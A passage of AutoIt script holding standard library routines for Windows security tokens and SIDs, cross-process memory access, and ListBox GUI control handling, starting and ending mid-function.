	Local $iattributes = DllStructGetData($tprevstate, "Attributes")
	If $fenable Then
		$iattributes = BitOR($iattributes, $se_privilege_enabled)
	Else
		$iattributes = BitAND($iattributes, BitNOT($se_privilege_enabled))
	EndIf
	DllStructSetData($tprevstate, "Attributes", $iattributes)
	If NOT _security__adjusttokenprivileges($htoken, False, $tprevstate, $iprevstate, $tcurrstate, $trequired) Then Return SetError(3, @error, False)
	Return True
EndFunc

Func _security__settokeninformation($htoken, $itokeninformation, $vtokeninformation, $itokeninformationlength)
	Local $acall = DllCall("advapi32.dll", "bool", "SetTokenInformation", "handle", $htoken, "int", $itokeninformation, "struct*", $vtokeninformation, "dword", $itokeninformationlength)
	If @error OR NOT $acall[0] Then Return SetError(1, @extended, False)
	Return True
EndFunc

Func _security__sidtostringsid($psid)
	If NOT _security__isvalidsid($psid) Then Return SetError(1, 0, "")
	Local $acall = DllCall("advapi32.dll", "bool", "ConvertSidToStringSidW", "struct*", $psid, "ptr*", 0)
	If @error OR NOT $acall[0] Then Return SetError(2, @extended, "")
	Local $pstringsid = $acall[2]
	Local $ssid = DllStructGetData(DllStructCreate("wchar Text[" & _winapi_stringlenw($pstringsid) + 1 & "]", $pstringsid), "Text")
	_winapi_localfree($pstringsid)
	Return $ssid
EndFunc

Func _security__sidtypestr($itype)
	Switch $itype
		Case $sidtypeuser
			Return "User"
		Case $sidtypegroup
			Return "Group"
		Case $sidtypedomain
			Return "Domain"
		Case $sidtypealias
			Return "Alias"
		Case $sidtypewellknowngroup
			Return "Well Known Group"
		Case $sidtypedeletedaccount
			Return "Deleted Account"
		Case $sidtypeinvalid
			Return "Invalid"
		Case $sidtypeunknown
			Return "Unknown Type"
		Case $sidtypecomputer
			Return "Computer"
		Case $sidtypelabel
			Return "A mandatory integrity label SID"
		Case Else
			Return "Unknown SID Type"
	EndSwitch
EndFunc

Func _security__stringsidtosid($ssid)
	Local $acall = DllCall("advapi32.dll", "bool", "ConvertStringSidToSidW", "wstr", $ssid, "ptr*", 0)
	If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
	Local $psid = $acall[2]
	Local $tbuffer = DllStructCreate("byte Data[" & _security__getlengthsid($psid) & "]", $psid)
	Local $tsid = DllStructCreate("byte Data[" & DllStructGetSize($tbuffer) & "]")
	DllStructSetData($tsid, "Data", DllStructGetData($tbuffer, "Data"))
	_winapi_localfree($psid)
	Return $tsid
EndFunc

Global Const $tagmemmap = "handle hProc;ulong_ptr Size;ptr Mem"

Func _memfree(ByRef $tmemmap)
	Local $pmemory = DllStructGetData($tmemmap, "Mem")
	Local $hprocess = DllStructGetData($tmemmap, "hProc")
	Local $bresult = _memvirtualfreeex($hprocess, $pmemory, 0, $mem_release)
	DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hprocess)
	If @error Then Return SetError(@error, @extended, False)
	Return $bresult
EndFunc

Func _memglobalalloc($ibytes, $iflags = 0)
	Local $aresult = DllCall("kernel32.dll", "handle", "GlobalAlloc", "uint", $iflags, "ulong_ptr", $ibytes)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _memglobalfree($hmem)
	Local $aresult = DllCall("kernel32.dll", "ptr", "GlobalFree", "handle", $hmem)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _memgloballock($hmem)
	Local $aresult = DllCall("kernel32.dll", "ptr", "GlobalLock", "handle", $hmem)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _memglobalsize($hmem)
	Local $aresult = DllCall("kernel32.dll", "ulong_ptr", "GlobalSize", "handle", $hmem)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _memglobalunlock($hmem)
	Local $aresult = DllCall("kernel32.dll", "bool", "GlobalUnlock", "handle", $hmem)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _meminit($hwnd, $isize, ByRef $tmemmap)
	Local $aresult = DllCall("User32.dll", "dword", "GetWindowThreadProcessId", "hwnd", $hwnd, "dword*", 0)
	If @error Then Return SetError(@error, @extended, 0)
	Local $iprocessid = $aresult[2]
	If $iprocessid = 0 Then Return SetError(1, 0, 0)
	Local $iaccess = BitOR($process_vm_operation, $process_vm_read, $process_vm_write)
	Local $hprocess = __mem_openprocess($iaccess, False, $iprocessid, True)
	Local $ialloc = BitOR($mem_reserve, $mem_commit)
	Local $pmemory = _memvirtualallocex($hprocess, 0, $isize, $ialloc, $page_readwrite)
	If $pmemory = 0 Then Return SetError(2, 0, 0)
	$tmemmap = DllStructCreate($tagmemmap)
	DllStructSetData($tmemmap, "hProc", $hprocess)
	DllStructSetData($tmemmap, "Size", $isize)
	DllStructSetData($tmemmap, "Mem", $pmemory)
	Return $pmemory
EndFunc

Func _memmovememory($psource, $pdest, $ilength)
	DllCall("kernel32.dll", "none", "RtlMoveMemory", "struct*", $pdest, "struct*", $psource, "ulong_ptr", $ilength)
	If @error Then Return SetError(@error, @extended)
EndFunc

Func _memread(ByRef $tmemmap, $psrce, $pdest, $isize)
	Local $aresult = DllCall("kernel32.dll", "bool", "ReadProcessMemory", "handle", DllStructGetData($tmemmap, "hProc"), "ptr", $psrce, "struct*", $pdest, "ulong_ptr", $isize, "ulong_ptr*", 0)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _memwrite(ByRef $tmemmap, $psrce, $pdest = 0, $isize = 0, $ssrce = "struct*")
	If $pdest = 0 Then $pdest = DllStructGetData($tmemmap, "Mem")
	If $isize = 0 Then $isize = DllStructGetData($tmemmap, "Size")
	Local $aresult = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", DllStructGetData($tmemmap, "hProc"), "ptr", $pdest, $ssrce, $psrce, "ulong_ptr", $isize, "ulong_ptr*", 0)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _memvirtualalloc($paddress, $isize, $iallocation, $iprotect)
	Local $aresult = DllCall("kernel32.dll", "ptr", "VirtualAlloc", "ptr", $paddress, "ulong_ptr", $isize, "dword", $iallocation, "dword", $iprotect)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _memvirtualallocex($hprocess, $paddress, $isize, $iallocation, $iprotect)
	Local $aresult = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $hprocess, "ptr", $paddress, "ulong_ptr", $isize, "dword", $iallocation, "dword", $iprotect)
	If @error Then Return SetError(@error, @extended, 0)
	Return $aresult[0]
EndFunc

Func _memvirtualfree($paddress, $isize, $ifreetype)
	Local $aresult = DllCall("kernel32.dll", "bool", "VirtualFree", "ptr", $paddress, "ulong_ptr", $isize, "dword", $ifreetype)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func _memvirtualfreeex($hprocess, $paddress, $isize, $ifreetype)
	Local $aresult = DllCall("kernel32.dll", "bool", "VirtualFreeEx", "handle", $hprocess, "ptr", $paddress, "ulong_ptr", $isize, "dword", $ifreetype)
	If @error Then Return SetError(@error, @extended, False)
	Return $aresult[0]
EndFunc

Func __mem_openprocess($iaccess, $finherit, $iprocessid, $fdebugpriv = False)
	Local $aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid)
	If @error Then Return SetError(@error, @extended, 0)
	If $aresult[0] Then Return $aresult[0]
	If NOT $fdebugpriv Then Return 0
	Local $htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query))
	If @error Then Return SetError(@error, @extended, 0)
	_security__setprivilege($htoken, "SeDebugPrivilege", True)
	Local $ierror = @error
	Local $ilasterror = @extended
	Local $iret = 0
	If NOT @error Then
		$aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid)
		$ierror = @error
		$ilasterror = @extended
		If $aresult[0] Then $iret = $aresult[0]
		_security__setprivilege($htoken, "SeDebugPrivilege", False)
		If @error Then
			$ierror = @error
			$ilasterror = @extended
		EndIf
	EndIf
	DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $htoken)
	Return SetError($ierror, $ilasterror, $iret)
EndFunc

Global Const $_udf_globalids_offset = 2
Global Const $_udf_globalid_max_win = 16
Global Const $_udf_startid = 10000
Global Const $_udf_globalid_max_ids = 55535
Global Const $__udfguiconstant_ws_visible = 268435456
Global Const $__udfguiconstant_ws_child = 1073741824
Global $_udf_globalids_used[$_udf_globalid_max_win][$_udf_globalid_max_ids + $_udf_globalids_offset + 1]

Func __udf_getnextglobalid($hwnd)
	Local $nctrlid, $iusedindex = -1, $fallused = True
	If NOT WinExists($hwnd) Then Return SetError(-1, -1, 0)
	For $iindex = 0 To $_udf_globalid_max_win - 1
		If $_udf_globalids_used[$iindex][0] <> 0 Then
			If NOT WinExists($_udf_globalids_used[$iindex][0]) Then
				For $x = 0 To UBound($_udf_globalids_used, 2) - 1
					$_udf_globalids_used[$iindex][$x] = 0
				Next
				$_udf_globalids_used[$iindex][1] = $_udf_startid
				$fallused = False
			EndIf
		EndIf
	Next
	For $iindex = 0 To $_udf_globalid_max_win - 1
		If $_udf_globalids_used[$iindex][0] = $hwnd Then
			$iusedindex = $iindex
			ExitLoop 
		EndIf
	Next
	If $iusedindex = -1 Then
		For $iindex = 0 To $_udf_globalid_max_win - 1
			If $_udf_globalids_used[$iindex][0] = 0 Then
				$_udf_globalids_used[$iindex][0] = $hwnd
				$_udf_globalids_used[$iindex][1] = $_udf_startid
				$fallused = False
				$iusedindex = $iindex
				ExitLoop 
			EndIf
		Next
	EndIf
	If $iusedindex = -1 AND $fallused Then Return SetError(16, 0, 0)
	If $_udf_globalids_used[$iusedindex][1] = $_udf_startid + $_udf_globalid_max_ids Then
		For $iidindex = $_udf_globalids_offset To UBound($_udf_globalids_used, 2) - 1
			If $_udf_globalids_used[$iusedindex][$iidindex] = 0 Then
				$nctrlid = ($iidindex - $_udf_globalids_offset) + 10000
				$_udf_globalids_used[$iusedindex][$iidindex] = $nctrlid
				Return $nctrlid
			EndIf
		Next
		Return SetError(-1, $_udf_globalid_max_ids, 0)
	EndIf
	$nctrlid = $_udf_globalids_used[$iusedindex][1]
	$_udf_globalids_used[$iusedindex][1] += 1
	$_udf_globalids_used[$iusedindex][($nctrlid - 10000) + $_udf_globalids_offset] = $nctrlid
	Return $nctrlid
EndFunc

Func __udf_freeglobalid($hwnd, $iglobalid)
	If $iglobalid - $_udf_startid < 0 OR $iglobalid - $_udf_startid > $_udf_globalid_max_ids Then Return SetError(-1, 0, False)
	For $iindex = 0 To $_udf_globalid_max_win - 1
		If $_udf_globalids_used[$iindex][0] = $hwnd Then
			For $x = $_udf_globalids_offset To UBound($_udf_globalids_used, 2) - 1
				If $_udf_globalids_used[$iindex][$x] = $iglobalid Then
					$_udf_globalids_used[$iindex][$x] = 0
					Return True
				EndIf
			Next
			Return SetError(-3, 0, False)
		EndIf
	Next
	Return SetError(-2, 0, False)
EndFunc

Func __udf_debugprint($stext, $iline = @ScriptLineNumber, $err = @error, $ext = @extended)
	ConsoleWrite("!===========================================================" & @CRLF & "+======================================================" & @CRLF & "-->Line(" & StringFormat("%04d", $iline) & "):" & @TAB & $stext & @CRLF & "+======================================================" & @CRLF)
	Return SetError($err, $ext, 1)
EndFunc

Func __udf_validateclassname($hwnd, $sclassnames)
	__udf_debugprint("This is for debugging only, set the debug variable to false before submitting")
	If _winapi_isclassname($hwnd, $sclassnames) Then Return True
	Local $sseparator = Opt("GUIDataSeparatorChar")
	$sclassnames = StringReplace($sclassnames, $sseparator, ",")
	__udf_debugprint("Invalid Class Type(s):" & @LF & @TAB & "Expecting Type(s): " & $sclassnames & @LF & @TAB & "Received Type : " & _winapi_getclassname($hwnd))
	Exit 
EndFunc

Global $_lb_ghlastwnd
Global $debug_lb = False
Global Const $__listboxconstant_classname = "ListBox"
Global Const $__listboxconstant_classnames = $__listboxconstant_classname & "|TListbox"
Global Const $__listboxconstant_ws_tabstop = 65536
Global Const $__listboxconstant_default_gui_font = 17
Global Const $__listboxconstant_wm_setredraw = 11
Global Const $__listboxconstant_wm_getfont = 49

Func _guictrllistbox_addfile($hwnd, $sfile)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_addfile, 0, $sfile, 0, "wparam", "wstr")
	Else
		Return GUICtrlSendMsg($hwnd, $lb_addfile, 0, $sfile)
	EndIf
EndFunc

Func _guictrllistbox_addstring($hwnd, $stext)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_addstring, 0, $stext, 0, "wparam", "wstr")
	Else
		Return GUICtrlSendMsg($hwnd, $lb_addstring, 0, $stext)
	EndIf
EndFunc

Func _guictrllistbox_beginupdate($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If NOT IsHWnd($hwnd) Then $hwnd = GUICtrlGetHandle($hwnd)
	Return _sendmessage($hwnd, $__listboxconstant_wm_setredraw) = 0
EndFunc

Func _guictrllistbox_clickitem($hwnd, $iindex, $sbutton = "left", $fmove = False, $iclicks = 1, $ispeed = 0)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If NOT IsHWnd($hwnd) Then $hwnd = GUICtrlGetHandle($hwnd)
	Local $trect = _guictrllistbox_getitemrectex($hwnd, $iindex)
	Local $tpoint = _winapi_pointfromrect($trect)
	$tpoint = _winapi_clienttoscreen($hwnd, $tpoint)
	Local $ix, $iy
	_winapi_getxyfrompoint($tpoint, $ix, $iy)
	Local $imode = Opt("MouseCoordMode", 1)
	If NOT $fmove Then
		Local $apos = MouseGetPos()
		_winapi_showcursor(False)
		MouseClick($sbutton, $ix, $iy, $iclicks, $ispeed)
		MouseMove($apos[0], $apos[1], 0)
		_winapi_showcursor(True)
	Else
		MouseClick($sbutton, $ix, $iy, $iclicks, $ispeed)
	EndIf
	Opt("MouseCoordMode", $imode)
EndFunc

Func _guictrllistbox_create($hwnd, $stext, $ix, $iy, $iwidth = 100, $iheight = 200, $istyle = 11534338, $iexstyle = 512)
	If NOT IsHWnd($hwnd) Then
		Return SetError(1, 0, 0)
	EndIf
	If NOT IsString($stext) Then
		Return SetError(2, 0, 0)
	EndIf
	If $iwidth = -1 Then $iwidth = 100
	If $iheight = -1 Then $iheight = 200
	Local Const $ws_vscroll = 2097152, $ws_hscroll = 1048576, $ws_border = 8388608
	If $istyle = -1 Then $istyle = BitOR($ws_border, $ws_vscroll, $ws_hscroll, $lbs_sort)
	If $iexstyle = -1 Then $iexstyle = 512
	$istyle = BitOR($istyle, $__udfguiconstant_ws_visible, $__listboxconstant_ws_tabstop, $__udfguiconstant_ws_child, $lbs_notify)
	Local $nctrlid = __udf_getnextglobalid($hwnd)
	If @error Then Return SetError(@error, @extended, 0)
	Local $hlist = _winapi_createwindowex($iexstyle, $__listboxconstant_classname, "", $istyle, $ix, $iy, $iwidth, $iheight, $hwnd, $nctrlid)
	_winapi_setfont($hlist, _winapi_getstockobject($__listboxconstant_default_gui_font))
	If StringLen($stext) Then _guictrllistbox_addstring($hlist, $stext)
	Return $hlist
EndFunc

Func _guictrllistbox_deletestring($hwnd, $iindex)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_deletestring, $iindex)
	Else
		Return GUICtrlSendMsg($hwnd, $lb_deletestring, $iindex, 0)
	EndIf
EndFunc

Func _guictrllistbox_destroy(ByRef $hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	Local $destroyed = 0
	If IsHWnd($hwnd) Then
		If _winapi_inprocess($hwnd, $_lb_ghlastwnd) Then
			Local $nctrlid = _winapi_getdlgctrlid($hwnd)
			Local $hparent = _winapi_getparent($hwnd)
			$destroyed = _winapi_destroywindow($hwnd)
			Local $iret = __udf_freeglobalid($hparent, $nctrlid)
			If NOT $iret Then
			EndIf
		Else
			Return SetError(1, 1, False)
		EndIf
	Else
		$destroyed = GUICtrlDelete($hwnd)
	EndIf
	If $destroyed Then $hwnd = 0
	Return $destroyed <> 0
EndFunc

Func _guictrllistbox_dir($hwnd, $sfile, $iattributes = 0, $fbrackets = True)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If BitAND($iattributes, $ddl_drives) = $ddl_drives AND NOT $fbrackets Then
		Local $stext
		Local $gui_no_brackets = GUICreate("no brackets")
		Local $list_no_brackets = GUICtrlCreateList("", 240, 40, 120, 120)
		Local $v_ret = GUICtrlSendMsg($list_no_brackets, $lb_dir, $iattributes, $sfile)
		For $i = 0 To _guictrllistbox_getcount($list_no_brackets) - 1
			$stext = _guictrllistbox_gettext($list_no_brackets, $i)
			$stext = StringReplace(StringReplace(StringReplace($stext, "[", ""), "]", ":"), "-", "")
			_guictrllistbox_insertstring($hwnd, $stext)
		Next
		GUIDelete($gui_no_brackets)
		Return $v_ret
	Else
		If IsHWnd($hwnd) Then
			Return _sendmessage($hwnd, $lb_dir, $iattributes, $sfile, 0, "wparam", "wstr")
		Else
			Return GUICtrlSendMsg($hwnd, $lb_dir, $iattributes, $sfile)
		EndIf
	EndIf
EndFunc

Func _guictrllistbox_endupdate($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If NOT IsHWnd($hwnd) Then $hwnd = GUICtrlGetHandle($hwnd)
	Return _sendmessage($hwnd, $__listboxconstant_wm_setredraw, 1, 0) = 0
EndFunc

Func _guictrllistbox_findstring($hwnd, $stext, $fexact = False)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		If ($fexact) Then
			Return _sendmessage($hwnd, $lb_findstringexact, -1, $stext, 0, "wparam", "wstr")
		Else
			Return _sendmessage($hwnd, $lb_findstring, -1, $stext, 0, "wparam", "wstr")
		EndIf
	Else
		If ($fexact) Then
			Return GUICtrlSendMsg($hwnd, $lb_findstringexact, -1, $stext)
		Else
			Return GUICtrlSendMsg($hwnd, $lb_findstring, -1, $stext)
		EndIf
	EndIf
EndFunc

Func _guictrllistbox_findintext($hwnd, $stext, $istart = -1, $fwrapok = True)
	Local $slist
	Local $icount = _guictrllistbox_getcount($hwnd)
	For $ii = $istart + 1 To $icount - 1
		$slist = _guictrllistbox_gettext($hwnd, $ii)
		If StringInStr($slist, $stext) Then Return $ii
	Next
	If ($istart = -1) OR NOT $fwrapok Then Return - 1
	For $ii = 0 To $istart - 1
		$slist = _guictrllistbox_gettext($hwnd, $ii)
		If StringInStr($slist, $stext) Then Return $ii
	Next
	Return - 1
EndFunc

Func _guictrllistbox_getanchorindex($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_getanchorindex)
	Else
		Return GUICtrlSendMsg($hwnd, $lb_getanchorindex, 0, 0)
	EndIf
EndFunc

Func _guictrllistbox_getcaretindex($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_getcaretindex)
	Else
		Return GUICtrlSendMsg($hwnd, $lb_getcaretindex, 0, 0)
	EndIf
EndFunc

Func _guictrllistbox_getcount($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_getcount)
	Else
		Return GUICtrlSendMsg($hwnd, $lb_getcount, 0, 0)
	EndIf
EndFunc

Func _guictrllistbox_getcursel($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_getcursel)
	Else
		Return GUICtrlSendMsg($hwnd, $lb_getcursel, 0, 0)
	EndIf
EndFunc

Func _guictrllistbox_gethorizontalextent($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_gethorizontalextent)
	Else
		Return GUICtrlSendMsg($hwnd, $lb_gethorizontalextent, 0, 0)
	EndIf
EndFunc

Func _guictrllistbox_getitemdata($hwnd, $iindex)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_getitemdata, $iindex)
	Else
		Return GUICtrlSendMsg($hwnd, $lb_getitemdata, $iindex, 0)
	EndIf
EndFunc

Func _guictrllistbox_getitemheight($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_getitemheight)
	Else
		Return GUICtrlSendMsg($hwnd, $lb_getitemheight, 0, 0)
	EndIf
EndFunc

Func _guictrllistbox_getitemrect($hwnd, $iindex)
	Local $arect[4]
	Local $trect = _guictrllistbox_getitemrectex($hwnd, $iindex)
	$arect[0] = DllStructGetData($trect, "Left")
	$arect[1] = DllStructGetData($trect, "Top")
	$arect[2] = DllStructGetData($trect, "Right")
	$arect[3] = DllStructGetData($trect, "Bottom")
	Return $arect
EndFunc

Func _guictrllistbox_getitemrectex($hwnd, $iindex)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	Local $trect = DllStructCreate($tagrect)
	If IsHWnd($hwnd) Then
		_sendmessage($hwnd, $lb_getitemrect, $iindex, $trect, 0, "wparam", "struct*")
	Else
		GUICtrlSendMsg($hwnd, $lb_getitemrect, $iindex, DllStructGetPtr($trect))
	EndIf
	Return $trect
EndFunc

Func _guictrllistbox_getlistboxinfo($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_getlistboxinfo)
	Else
		Return GUICtrlSendMsg($hwnd, $lb_getlistboxinfo, 0, 0)
	EndIf
EndFunc

Func _guictrllistbox_getlocale($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_getlocale)
	Else
		Return GUICtrlSendMsg($hwnd, $lb_getlocale, 0, 0)
	EndIf
EndFunc

Func _guictrllistbox_getlocalecountry($hwnd)
	Return _winapi_hiword(_guictrllistbox_getlocale($hwnd))
EndFunc

Func _guictrllistbox_getlocalelang($hwnd)
	Return _winapi_loword(_guictrllistbox_getlocale($hwnd))
EndFunc

Func _guictrllistbox_getlocaleprimlang($hwnd)
	Return _winapi_primarylangid(_guictrllistbox_getlocalelang($hwnd))
EndFunc

Func _guictrllistbox_getlocalesublang($hwnd)
	Return _winapi_sublangid(_guictrllistbox_getlocalelang($hwnd))
EndFunc

Func _guictrllistbox_getsel($hwnd, $iindex)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_getsel, $iindex) <> 0
	Else
		Return GUICtrlSendMsg($hwnd, $lb_getsel, $iindex, 0) <> 0
	EndIf
EndFunc

Func _guictrllistbox_getselcount($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_getselcount)
	Else
		Return GUICtrlSendMsg($hwnd, $lb_getselcount, 0, 0)
	EndIf
EndFunc

Func _guictrllistbox_getselitems($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	Local $aarray[1] = [0]
	Local $icount = _guictrllistbox_getselcount($hwnd)
	If $icount > 0 Then
		ReDim $aarray[$icount + 1]
		Local $tarray = DllStructCreate("int[" & $icount & "]")
		If IsHWnd($hwnd) Then
			_sendmessage($hwnd, $lb_getselitems, $icount, $tarray, 0, "wparam", "struct*")
		Else
			GUICtrlSendMsg($hwnd, $lb_getselitems, $icount, DllStructGetPtr($tarray))
		EndIf
		$aarray[0] = $icount
		For $ii = 1 To $icount
			$aarray[$ii] = DllStructGetData($tarray, 1, $ii)
		Next
	EndIf
	Return $aarray
EndFunc

Func _guictrllistbox_getselitemstext($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	Local $atext[1] = [0], $icount = _guictrllistbox_getselcount($hwnd)
	If $icount > 0 Then
		Local $aindices = _guictrllistbox_getselitems($hwnd)
		ReDim $atext[UBound($aindices)]
		$atext[0] = $aindices[0]
		For $i = 1 To $aindices[0]
			$atext[$i] = _guictrllistbox_gettext($hwnd, $aindices[$i])
		Next
	EndIf
	Return $atext
EndFunc

Func _guictrllistbox_gettext($hwnd, $iindex)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	Local $ttext = DllStructCreate("wchar Text[" & _guictrllistbox_gettextlen($hwnd, $iindex) + 1 & "]")
	If NOT IsHWnd($hwnd) Then $hwnd = GUICtrlGetHandle($hwnd)
	_sendmessage($hwnd, $lb_gettext, $iindex, $ttext, 0, "wparam", "struct*")
	Return DllStructGetData($ttext, "Text")
EndFunc

Func _guictrllistbox_gettextlen($hwnd, $iindex)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_gettextlen, $iindex)
	Else
		Return GUICtrlSendMsg($hwnd, $lb_gettextlen, $iindex, 0)
	EndIf
EndFunc

Func _guictrllistbox_gettopindex($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_gettopindex)
	Else
		Return GUICtrlSendMsg($hwnd, $lb_gettopindex, 0, 0)
	EndIf
EndFunc

Func _guictrllistbox_initstorage($hwnd, $iitems, $ibytes)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_initstorage, $iitems, $ibytes)
	Else
		Return GUICtrlSendMsg($hwnd, $lb_initstorage, $iitems, $ibytes)
	EndIf
EndFunc

Func _guictrllistbox_insertstring($hwnd, $stext, $iindex = -1)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_insertstring, $iindex, $stext, 0, "wparam", "wstr")
	Else
		Return GUICtrlSendMsg($hwnd, $lb_insertstring, $iindex, $stext)
	EndIf
EndFunc

Func _guictrllistbox_itemfrompoint($hwnd, $ix, $iy)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	Local $iret
	If IsHWnd($hwnd) Then
		$iret = _sendmessage($hwnd, $lb_itemfrompoint, 0, _winapi_makelong($ix, $iy))
	Else
		$iret = GUICtrlSendMsg($hwnd, $lb_itemfrompoint, 0, _winapi_makelong($ix, $iy))
	EndIf
	If _winapi_hiword($iret) <> 0 Then $iret = -1
	Return $iret
EndFunc

Func _guictrllistbox_replacestring($hwnd, $iindex, $stext)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If (_guictrllistbox_deletestring($hwnd, $iindex) == $lb_err) Then Return SetError($lb_err, $lb_err, False)
	If (_guictrllistbox_insertstring($hwnd, $stext, $iindex) == $lb_err) Then Return SetError($lb_err, $lb_err, False)
	Return True
EndFunc

Func _guictrllistbox_resetcontent($hwnd)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		_sendmessage($hwnd, $lb_resetcontent)
	Else
		GUICtrlSendMsg($hwnd, $lb_resetcontent, 0, 0)
	EndIf
EndFunc

Func _guictrllistbox_selectstring($hwnd, $stext, $iindex = -1)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_selectstring, $iindex, $stext, 0, "wparam", "wstr")
	Else
		Return GUICtrlSendMsg($hwnd, $lb_selectstring, $iindex, $stext)
	EndIf
EndFunc

Func _guictrllistbox_selitemrange($hwnd, $ifirst, $ilast, $fselect = True)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_selitemrange, $fselect, _winapi_makelong($ifirst, $ilast)) = 0
	Else
		Return GUICtrlSendMsg($hwnd, $lb_selitemrange, $fselect, _winapi_makelong($ifirst, $ilast)) = 0
	EndIf
EndFunc

Func _guictrllistbox_selitemrangeex($hwnd, $ifirst, $ilast)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_selitemrangeex, $ifirst, $ilast) = 0
	Else
		Return GUICtrlSendMsg($hwnd, $lb_selitemrangeex, $ifirst, $ilast) = 0
	EndIf
EndFunc

Func _guictrllistbox_setanchorindex($hwnd, $iindex)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
		Return _sendmessage($hwnd, $lb_setanchorindex, $iindex) = 0
	Else
		Return GUICtrlSendMsg($hwnd, $lb_setanchorindex, $iindex, 0) = 0
	EndIf
EndFunc

Func _guictrllistbox_setcaretindex($hwnd, $iindex, $fpartial = False)
	If $debug_lb Then __udf_validateclassname($hwnd, $__listboxconstant_classnames)
	If IsHWnd($hwnd) Then
